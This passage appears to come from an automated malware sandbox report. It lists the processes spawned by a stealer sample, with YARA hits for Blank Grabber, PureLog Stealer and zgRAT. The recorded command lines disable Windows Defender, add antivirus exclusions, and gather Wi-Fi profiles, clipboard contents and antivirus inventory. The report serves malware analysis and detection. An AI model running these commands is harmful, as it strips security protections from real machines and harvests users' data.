                                                                                                  Target ID:4
                                                                                                  Start time:18:07:03
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe -pbeznogym
                                                                                                  Imagebase:0x920000
                                                                                                  File size:17'830'453 bytes
                                                                                                  MD5 hash:4FEC8FAF6590F62034AD44A54175B9E9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 75%, ReversingLabs
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:5
                                                                                                  Start time:18:07:05
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\ProgramData\Microsoft\hacn.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\ProgramData\Microsoft\hacn.exe"
                                                                                                  Imagebase:0x7ff692970000
                                                                                                  File size:11'662'615 bytes
                                                                                                  MD5 hash:FC445049713C02F9A9DDAA62E404C9E9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  • Detection: 71%, ReversingLabs
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:6
                                                                                                  Start time:18:07:05
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\ProgramData\Microsoft\based.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\ProgramData\Microsoft\based.exe"
                                                                                                  Imagebase:0x7ff7d1540000
                                                                                                  File size:6'127'126 bytes
                                                                                                  MD5 hash:838A5BD59DE32F425938CBA6C119CBEE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000006.00000003.1736293542.00000202B6EA5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000006.00000003.1736293542.00000202B6EA3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 55%, ReversingLabs
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:7
                                                                                                  Start time:18:07:06
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\ProgramData\Microsoft\hacn.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\ProgramData\Microsoft\hacn.exe"
                                                                                                  Imagebase:0x7ff692970000
                                                                                                  File size:11'662'615 bytes
                                                                                                  MD5 hash:FC445049713C02F9A9DDAA62E404C9E9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:8
                                                                                                  Start time:18:07:06
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\ProgramData\Microsoft\based.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\ProgramData\Microsoft\based.exe"
                                                                                                  Imagebase:0x7ff7d1540000
                                                                                                  File size:6'127'126 bytes
                                                                                                  MD5 hash:838A5BD59DE32F425938CBA6C119CBEE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000008.00000003.1757107261.00000273ED37D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:9
                                                                                                  Start time:18:07:06
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe -pbeznogym
                                                                                                  Imagebase:0x7ff6eab90000
                                                                                                  File size:289'792 bytes
                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:10
                                                                                                  Start time:18:07:06
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:11
                                                                                                  Start time:18:07:06
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe -pbeznogym
                                                                                                  Imagebase:0x630000
                                                                                                  File size:6'361'390 bytes
                                                                                                  MD5 hash:E5DB23B3AAF4DDDD2BAF96FB7BBA9616
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000003.1750025071.000000000773B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 21%, ReversingLabs
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:12
                                                                                                  Start time:18:07:08
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\ProgramData\svchost.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\ProgramData\svchost.exe"
                                                                                                  Imagebase:0x8e0000
                                                                                                  File size:4'042'529 bytes
                                                                                                  MD5 hash:45C59202DCE8ED255B4DBD8BA74C630F
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000003.1760108075.0000000005C00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000003.1761289490.0000000006400000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProgramData\svchost.exe, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\svchost.exe, Author: Joe Security
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Avira
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  • Detection: 79%, ReversingLabs
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:13
                                                                                                  Start time:18:07:08
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\ProgramData\setup.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\ProgramData\setup.exe"
                                                                                                  Imagebase:0x7ff690c40000
                                                                                                  File size:5'617'152 bytes
                                                                                                  MD5 hash:1274CBCD6329098F79A3BE6D76AB8B97
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Avira
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  • Detection: 71%, ReversingLabs
                                                                                                  Has exited:true

                                                                                                  Target ID:14
                                                                                                  Start time:18:07:08
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
                                                                                                  Imagebase:0x7ff6eab90000
                                                                                                  File size:289'792 bytes
                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:15
                                                                                                  Start time:18:07:08
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                  Imagebase:0x7ff6eab90000
                                                                                                  File size:289'792 bytes
                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:16
                                                                                                  Start time:18:07:08
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:17
                                                                                                  Start time:18:07:08
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:18
                                                                                                  Start time:18:07:08
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? .scr'"
                                                                                                  Imagebase:0x7ff6eab90000
                                                                                                  File size:289'792 bytes
                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:19
                                                                                                  Start time:18:07:08
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:20
                                                                                                  Start time:18:07:09
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                  Imagebase:0x7ff788560000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:21
                                                                                                  Start time:18:07:09
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                  Imagebase:0x7ff788560000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:22
                                                                                                  Start time:18:07:09
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:23
                                                                                                  Start time:18:07:09
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe"
                                                                                                  Imagebase:0x540000
                                                                                                  File size:147'456 bytes
                                                                                                  MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:24
                                                                                                  Start time:18:07:09
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? .scr'
                                                                                                  Imagebase:0x7ff788560000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:25
                                                                                                  Start time:18:07:09
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                                                                                                  Imagebase:0x7ff788560000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:26
                                                                                                  Start time:18:07:10
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                  Imagebase:0x7ff6eab90000
                                                                                                  File size:289'792 bytes
                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:27
                                                                                                  Start time:18:07:10
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                  Imagebase:0x7ff6eab90000
                                                                                                  File size:289'792 bytes
                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:28
                                                                                                  Start time:18:07:10
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:29
                                                                                                  Start time:18:07:10
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:30
                                                                                                  Start time:18:07:10
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                  Imagebase:0x7ff6eab90000
                                                                                                  File size:289'792 bytes
                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:31
                                                                                                  Start time:18:07:10
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                  Imagebase:0x7ff6eab90000
                                                                                                  File size:289'792 bytes
                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:32
                                                                                                  Start time:18:07:10
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:33
                                                                                                  Start time:18:07:10
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                  Imagebase:0x7ff6eab90000
                                                                                                  File size:289'792 bytes
                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:34
                                                                                                  Start time:18:07:10
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:35
                                                                                                  Start time:18:07:10
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                  Imagebase:0x7ff6eab90000
                                                                                                  File size:289'792 bytes
                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:36
                                                                                                  Start time:18:07:11
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                                                  Imagebase:0x7ff6eab90000
                                                                                                  File size:289'792 bytes
                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:37
                                                                                                  Start time:18:07:11
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:38
                                                                                                  Start time:18:07:11
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:39
                                                                                                  Start time:18:07:11
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
                                                                                                  Imagebase:0x240000
                                                                                                  File size:236'544 bytes
                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:40
                                                                                                  Start time:18:07:11
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:41
                                                                                                  Start time:18:07:11
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:tasklist /FO LIST
                                                                                                  Imagebase:0x7ff70f330000
                                                                                                  File size:106'496 bytes
                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:42
                                                                                                  Start time:18:07:11
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:powershell Get-Clipboard
                                                                                                  Imagebase:0x7ff788560000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:43
                                                                                                  Start time:18:07:11
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\tree.com
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:tree /A /F
                                                                                                  Imagebase:0x7ff768f20000
                                                                                                  File size:20'992 bytes
                                                                                                  MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:44
                                                                                                  Start time:18:07:11
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                  Imagebase:0x7ff7a7880000
                                                                                                  File size:576'000 bytes
                                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:45
                                                                                                  Start time:18:07:11
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:tasklist /FO LIST
                                                                                                  Imagebase:0x7ff66f390000
                                                                                                  File size:106'496 bytes
                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:46
                                                                                                  Start time:18:07:11
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:tasklist /FO LIST
                                                                                                  Imagebase:0x7ff66f390000
                                                                                                  File size:106'496 bytes
                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:47
                                                                                                  Start time:18:07:12
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Target ID:48
